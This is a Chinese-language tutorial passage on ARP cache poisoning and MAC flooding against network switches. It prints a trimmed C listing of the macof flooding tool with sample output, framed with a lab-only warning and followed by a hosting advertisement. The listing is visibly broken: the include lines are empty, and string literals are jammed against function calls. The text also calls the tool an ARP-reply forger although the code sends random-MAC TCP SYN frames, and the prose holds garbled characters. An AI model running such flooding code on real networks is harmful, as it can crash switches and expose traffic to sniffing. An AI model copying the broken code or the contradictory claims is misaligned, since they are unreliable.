戰(zhàn)術(shù)攻防之近距離搏擊篇(ARP)攻擊(2)

◆ARP緩存中毒

這是個(gè)非常有意思的標(biāo)題—“中毒”，這能讓我聯(lián)想到霉綠色的空氣和腐銹的紅色河水，畢竟地球區(qū)域生態(tài)環(huán)境令人擔(dān)心?。

ARP緩存中毒其實(shí)質(zhì)并沒有字面含義那么可怕。還記得前面所提高過(guò)ARP緩存表的概念吧，事實(shí)上每個(gè)網(wǎng)絡(luò)設(shè)備都有一個(gè)APR表，其中臨時(shí)記錄著匹配的設(shè)備MAC和IP地址映射對(duì)。它保證這些記錄具有唯一性，即一個(gè)IP只單獨(dú)映射一個(gè)MAC。又由于ARP本身不具備認(rèn)證信任機(jī)制，因此欺騙行為變的泛濫。當(dāng)網(wǎng)絡(luò)設(shè)備發(fā)送ARP REQUEST時(shí)，它完全相信ARP REPLY回應(yīng)是來(lái)自于正確設(shè)備，因?yàn)樗�不能�?yàn)證回應(yīng)數(shù)據(jù)包是否確切從正確的設(shè)備發(fā)送的。更糟糕的是，許多操作系統(tǒng)并不需要發(fā)送ARP請(qǐng)求數(shù)據(jù)包就直接承認(rèn)其他設(shè)備發(fā)送的ARP回應(yīng)數(shù)據(jù)包。

這樣垃圾方式的設(shè)計(jì)讓入侵變的肆意，而防御卻無(wú)奈了許多。假設(shè)我是一個(gè)黑帽，我知道ARP并無(wú)驗(yàn)證行為，而且系統(tǒng)不需要發(fā)送請(qǐng)求數(shù)據(jù)包就可接收ARP的回應(yīng)數(shù)據(jù)包。我會(huì)怎么做？創(chuàng)建一個(gè)貌似合法的ARP REPLY數(shù)據(jù)包，其中偽造我所希望的MAC和IP地址，并發(fā)送給盲目接收此類數(shù)據(jù)包的主機(jī)系統(tǒng)。結(jié)果，這種方式欺騙主機(jī)使其更新我所希望的MAC-IP地址映射對(duì)。當(dāng)然，我可以肆意廣播這種ARP REPLY數(shù)據(jù)包，愚弄整個(gè)網(wǎng)絡(luò)系統(tǒng)所有主機(jī)(?冷)。

現(xiàn)在你知道了ARP的一個(gè)小技巧，我們稱其為：ARP緩存中毒。正是通過(guò)它，無(wú)數(shù)的發(fā)明創(chuàng)造出來(lái)，正如輪子的發(fā)明可以和人類登月媲美，簡(jiǎn)單的發(fā)明可以翹動(dòng)地球。

◆MAC泛洪攻擊(Flooding)

現(xiàn)在的網(wǎng)絡(luò)結(jié)構(gòu)大多數(shù)使用交換方式(Switched)結(jié)構(gòu)取代早先的的廣播方式(Broadcast)，這樣的優(yōu)勢(shì)在于交換機(jī)不會(huì)向每個(gè)端口無(wú)聊的推送廣播風(fēng)暴，它稍微智能的判斷需要推送數(shù)據(jù)的端口，這讓那些層在HUB方式連接的下大顯神威的嗅探器(snffer)感到憋足。

然而進(jìn)步的力量有時(shí)候令“安全”變的很嬌嫩。交換機(jī)啟用端口安全特性(Port security)需要消耗部分的CPU，當(dāng)交換處理超負(fù)載后，交換機(jī)就無(wú)法處理端口安全，此時(shí)交換機(jī)陷入了HUB模式，數(shù)據(jù)被簡(jiǎn)單的廣播到網(wǎng)絡(luò)中的每臺(tái)計(jì)算機(jī)中，于是竊聽活動(dòng)仍然可以繼續(xù)。于是利用大量的偽造ARP REQUEST數(shù)據(jù)包對(duì)交換機(jī)的ARP表進(jìn)行泛洪攻擊(ARP緩存表中毒的典型運(yùn)用)，可以輕易使很多廠商交換機(jī)負(fù)荷過(guò)載(CISCO 1900和3COM superstackII就容易遭受攻擊)，此刻交換機(jī)處于類似HUB工作方式，因而可輕松使用包嗅探器刺探整個(gè)網(wǎng)絡(luò)。

macof的小程序輕松了實(shí)現(xiàn)了這樣的功能，其代碼實(shí)現(xiàn)如下：
---------------snip-------------------
＃include "config.h"
＃include 
＃include 
＃include 
＃include 
＃include 
＃include 
＃include

＃include "version.h"

extern char *ether_ntoa(struct ether_addr *);
extern struct ether_addr *ether_aton(char *);

in_addr_t Src = 0;
in_addr_t Dst = 0;
u_char *Tha = NULL;
u_short Dport = 0;
u_short Sport = 0;
char   *Intf = NULL;
int Repeat = -1;  //導(dǎo)致偽造MAC的無(wú)限循環(huán)

void usage(void) {
fprintf(stderr, "Version: " VERSION "\n"
"Usage: macof ");
exit(1);
}
void gen_mac(u_char *mac) {
   //產(chǎn)生隨機(jī)MAC地址
*((in_addr_t *)mac) = libnet_get_prand(PRu32);
*((u_short *)(mac + 4)) = libnet_get_prand(PRu16);
}
int main(int argc, char *argv[]) {
int c, i;
struct libnet_link_int *llif;
char ebuf[PCAP_ERRBUF_SIZE];
u_char sha[ETHER_ADDR_LEN], tha[ETHER_ADDR_LEN];
in_addr_t src, dst;
u_short sport, dport;
u_int32_t seq;
u_char pkt[ETH_H + IP_H + TCP_H];
if (!Intf && (Intf = pcap_lookupdev(ebuf)) == NULL)
errx(1, "%s", ebuf);
if ((llif = libnet_open_link_interface(Intf, ebuf)) == 0)
errx(1, "%s", ebuf);
libnet_seed_prand();
for (i = 0; i != Repeat; i++) {  
gen_mac(sha);
   gen_mac(tha);
   src = libnet_get_prand(PRu32);
dst = libnet_get_prand(PRu32);
sport = libnet_get_prand(PRu16);
dport = libnet_get_prand(PRu16);
seq = libnet_get_prand(PRu32);
//偽造貌似合法MAC地址
libnet_build_ethernet(tha, sha, ETHERTYPE_IP, NULL, 0, pkt);
libnet_build_ip(TCP_H, 0, libnet_get_prand(PRu16), 0, 64,
  IPPROTO_TCP, src, dst, NULL, 0, pkt + ETH_H);
libnet_build_tcp(sport, dport, seq, 0, TH_SYN, 512,
   0, NULL, 0, pkt + ETH_H + IP_H);
libnet_do_checksum(pkt + ETH_H, IPPROTO_IP, IP_H);
libnet_do_checksum(pkt + ETH_H, IPPROTO_TCP, TCP_H);
if (libnet_write_link_layer(llif, Intf, pkt, sizeof(pkt)) < 0)
 errx(1, "write");
fprintf(stderr, "%s ",
 "源MAC地址："ether_ntoa((struct ether_addr *)sha));
fprintf(stderr, "%s\n %s:%d > %s:%d\n",
 "目標(biāo)MAC地址："ether_ntoa((struct ether_addr *)tha),
 "源IP地址/端口："libnet_host_lookup(Src, 0), sport,
 "目標(biāo)IP地址/端口："libnet_host_lookup(Dst, 0), dport);
}
exit(0);
}
-----------------snip end-----------------------------

/* 本程序的作者是Dug Songdugsong@m.org，由于這里只需要實(shí)現(xiàn)MAC FLOODING的攻擊，所以我對(duì)程序做了精簡(jiǎn)，便于讀者直觀了解MAC FLOODING的攻擊原理。另外，macof的最早作者是Ian Vitek，采用Perl進(jìn)行編寫的*/

#macof 測(cè)試
[root@hackersvr /]# macof

源MAC地址：77:6b:e1:6e:5e:8c目標(biāo)MAC地址：93:2d:ed:45:f9:e3

源IP地址/端口：0.0.0.0:45702目標(biāo)IP地址/端口0.0.0.0:11000

源MAC地址：84:a4:d3:57:ef:8目標(biāo)MAC地址：12:56:52:42:dc:95

源IP地址/端口：0.0.0.0:16630目標(biāo)IP地址/端口0.0.0.0:3031

源MAC地址：f0:9:3f:18:89目標(biāo)MAC地址：1d:86:53:53:d7:f8

源IP地址/端口：0.0.0.0:15535目標(biāo)IP地址/端口0.0.0.0:7466 …………

此程序偽裝大量ARP回應(yīng)數(shù)據(jù)包，導(dǎo)致交換機(jī)過(guò)載處理，因而陷入HUB方式處理數(shù)據(jù)包，Port Security特性失效。通過(guò)這種方式導(dǎo)致網(wǎng)絡(luò)安全再度陷入了竊聽的恐慌之中(注意：本程序只做實(shí)驗(yàn)用途，嚴(yán)禁使用于任何工作環(huán)境，否則將導(dǎo)致網(wǎng)絡(luò)癱瘓或交換機(jī)硬件重置)。

服務(wù)器租用/服務(wù)器托管中國(guó)五強(qiáng)！虛擬主機(jī)域名注冊(cè)頂級(jí)提供商！15年品質(zhì)保障！--億恩科技[ENKJ.COM]